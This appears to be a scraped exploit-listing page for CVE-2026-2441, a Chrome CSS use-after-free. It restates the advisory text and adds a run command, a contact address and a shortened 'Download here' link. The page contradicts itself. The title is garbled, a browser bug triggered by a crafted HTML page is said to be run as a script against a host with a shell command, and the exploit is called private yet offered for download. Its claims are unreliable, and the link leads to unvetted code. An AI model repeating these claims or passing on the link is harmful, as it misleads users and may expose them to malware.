## https://sploitus.com/exploit?id=C8F4B746-7A88-5166-B9E7-8D3D4964CC42
# CSS in Google Chrome prior to Remote Code Execution (CVE-2026-2441)
## Overview
A HIGH vulnerability, classified as CVE-2026-2441, has been identified, categorized under CWE-416, (CVSS 8.8). Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
## Details
- **CVE ID**: [CVE-2026-2441](https://nvd.nist.gov/vuln/detail/CVE-2026-2441)
- **Discovered**: 2026-02-13
- **Published**: 2026-02-13
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
## Affected Versions
**Google Chrome:**
- before 145.0.7632.75
- before 145.0.7632.76
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **security@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/2d7u8dj9)